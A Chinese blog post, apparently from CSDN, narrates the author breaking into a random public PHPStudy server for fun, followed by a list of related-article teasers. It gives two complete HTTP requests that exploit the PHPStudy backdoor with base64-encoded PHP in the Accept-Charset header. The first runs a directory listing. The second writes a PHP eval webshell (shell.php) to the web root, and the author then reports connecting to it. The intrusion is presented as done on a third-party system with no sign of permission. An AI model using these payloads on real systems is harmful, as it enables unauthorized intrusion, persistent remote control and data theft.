php漏洞挖掘与修复 英文版,记一次PHPstudy漏洞挖掘过程

最新推荐文章于 2023-07-11 23:27:18 发布
最新推荐文章于 2023-07-11 23:27:18 发布
阅读量103 收藏
点赞数
文章标签: php漏洞挖掘与修复 英文版

今天有点烦躁,所以得找点事刺激一下

于是,公网上搜了一个PHPstudy的站

f1677ce83d57aaad2ed9738648b1eeeb.png

测试payload看看有没有漏洞,果然、存在漏洞

c9ffc031568a1d7248a2f644157cc809.png

看一下目录GET /phpinfo.php HTTP/1.1

Host: xx.xx.xx.xx

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip,deflate

Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw==

Connection: close

ae81a10c416f8851722355db732c5886.png

写入webshellGET /phpinfo.php HTTP/1.1

Host: xx.xx.xx.xx

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip,deflate

Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw==

Connection: close

05c091f9558464a3f839300415927c9c.png

再次查看一下目录,可以看到成功了

2b8b464526697bca9efc1660adc497e0.png

连接,OK,收工。。。

d5f38833d5f5c88d00acf2ebfe951390.png

凌柒y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php漏洞挖掘修复 英文版,[原创]PHP 7 漏洞挖掘系列之二:Heap-based integer overflow...
weixin_42349126的博客
03-11 180
0x01 前言这个漏洞是玄武实验室的人挖出来的,我这边做一下分享吧。我们不是漏洞挖掘者,只是漏洞搬运者。好了,进入正题吧,这篇文章主要讲述的是基于堆的整数溢出,找了好久终于找到一个比较简单易懂的漏洞进行分析。0x02 漏洞分析首先放poc:...
Phpstudy For Linux
william_n的博客
01-01 4497
1.应用场景 借助phpstudy工具包, 快速搭建linux开发/测试/生产环境. 2.学习/操作 1. 介绍 2. 软硬件要求/安装步骤 实践整理发出... 后续补充 ... 3.问题 TBD 4.参考 ht...
phpStudy 20180211 官方版
吴成伟的博客
03-17 1160
今天打算做个微信小程序,需要用到php,但是官网没有找到5.6版本,于是就找到了phpstudy,一个集成了Apache,php,mysql环境的一个软件,录下来,方便以后使用 地址如下 ...
PHP文件包含利用phpinfo写入shell
qq_63489512的博客
07-11 888
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件来GetShell。由于临时文件的文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
http 协议笔
王继超的专栏
01-15 769
webservice = http协议+xml rest = http协议 + json 各种api 也一般是用http + xml/json 来实现的 做采集小偷站, 或者学习ajax 也要了解http 协议 计算机中的协议和现实中的协议是一样的, 一式双份或者多份 双方都遵循一个规范,这个规范就可以称之为协议 ftp http stmp pop tcp/ip
phpstudy php5.2.17nts版本
09-29
PHPStudyPHP5.2.17 NTS版本详解》 PHPStudy是一款深受开发者喜爱的PHP集成开发环境,它集成了Apache服务器、MySQL数据库以及PHP等多种Web开发所需的重要组件,使得开发者能够在本地环境中轻松搭建并测试Web应用...
phpstudyphp版本自由修改的方法
12-19
网上有着许多的网站集成搭建软件,比较出名的就有wamp,xampp,phpstudy等等 现在就来讲一讲phpstuy的php版本自由切换 安装下载之类的就不说了,http://www.phpstudy.net/ 官网就有,十分简单 看看界面,软件的作者...
phpstudy php5.2.17nts 下载
11-08
在下载过程中,用户需要注意的是,确保下载的版本与自己的系统环境兼容,包括操作系统类型(Windows/Linux等)、位数(32位/64位)以及服务器环境(Apache/IIS等)。 安装PHP5.2.17 NTS版的步骤大致如下: 1. 下载...
小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本
04-20
1. 本资料仅供学习参考,严禁使用者进行未授权渗透测试! 2. 虽然本漏洞已经提交给相关机构,漏洞目前仍处于1Day,传播并造成危害,...4. 本文档内容完整版取自渊龙Sec安全团队内部漏洞库,本文为公开版本,有所缩减。
phpstudyRCE phpstudy漏洞
04-20
PHPStudy RCE(Remote Code Execution)是指在使用PHPStudy工具的过程中,由于配置不当或存在漏洞,导致攻击者可以远程执行恶意代码并控制受影响的服务器。 以下是对PHPStudy RCE的简要介绍: PHPStudyPHPStudy...
http accept-encoding详解 HTTP协议-压缩(gzip,deflate)
编程小生的专栏
09-26 1万+
本文会使用Fiddler来查看HTTP request和Response, 如果不熟悉这个工具,可以先参考[Fiddler教程] HTTP压缩是指: Web服务器和浏览器之间压缩传输的”文本内容“的方法。 HTTP采用通用的压缩算法,比如gzip来压缩HTML,Javascript, CSS文件。 能大大减少网络传输的数据量,提高了用户显示网页的速度。当然,同时会增加一点点服务器的开销。 本文从HTTP协议的角度,来理解HTTP压缩这个概念。 阅读目录 HTTP内容编码和HTTP压缩的区别 HT.
phpstudy安装及使用教程
热门推荐
qq_31763129的博客
04-17 2万+
对于程序员来说,phpstudy是一个非常好用的PHP调试环境集成包,包含了最新的Apache和PHP等程序,对学习PHP的新手来说,WINDOWS下环境配置是一件很困难的事;对老手来说也是一件烦琐的事。因此无论你是新手还是老手,phpstudy程序包都是一个不错的选择。接下来小编就来跟大家说说使用phpstudy搭建php服务器的方法。  一、 下载PHPStudy      二、 安装  2....
thinkphp3.2中英文切换
qq_24038207的博客
06-22 1053
1.Application/home/conf/下新建了一个tags.php,内容如下 php     //中英文切换需要的文件,似乎只要第一行app_begin就可以了     return array(         // 添加下面一行定义即可         'app_begin'        => array('Behavior\CheckLangBehavior
漏洞挖掘与防范(基础篇)
chaojixiaojingang
08-13 1万+
这几天学习代码审计,学的是漏洞与挖掘(基础篇),这相对于其他的漏洞挖掘确实简单点,这几种漏洞是常见的SQL注入漏洞、XSS漏洞、CSRF漏洞,讲的是这三种漏洞的从代码部分的挖掘技巧,我感觉很有用,就写下来,希望能帮助大家学习。 1. SQL注入漏洞 SQL注入漏洞是我们知道的最多的漏洞,原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤就直接放入数...
php漏洞挖掘修复,一次PHPstudy漏洞挖掘过程
weixin_32809369的博客
03-10 163
今天有点烦躁,所以得找点事刺激一下于是,公网上搜了一个PHPstudy的站测试payload看看有没有漏洞,果然、存在漏洞看一下目录GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/...
php中出现“ HTTP 错误 403 - 禁止访问”解决办法 总结
zzc1684的博客
05-14 7644
安装Apache,版本2.2.6,装完刚测试可以;配置了下phpphp.in文件再次 localhost打开发现错误:HTTP 错误 403 - 禁止访问,即403 Forbidden:You don't have permission to access / on this server.权限又不够了? 打开apache的配置文件httpd.conf,逐行检查。在大约快一半的地方有以下这...
开题报告达达宠物认领信息网站的设计与实现 已通过开题答辩的.docx
最新发布
07-25
宠物认领信息网站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的网站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,网站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息网站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,网站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
WebGoat漏洞测试平台详解:PHPStudy+MySQL环境下的实战与防御策略
接着,讨论了测试环境,可能涉及PHPStudy和MySQL的搭建与配置,以便在本地环境中运行WebGoat。 第二部分深入解析了WebGoat的基础概念,包括WebWolf,这是一个子模块,用于教授HTTP基础,如HTTP协议、代理设置和使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值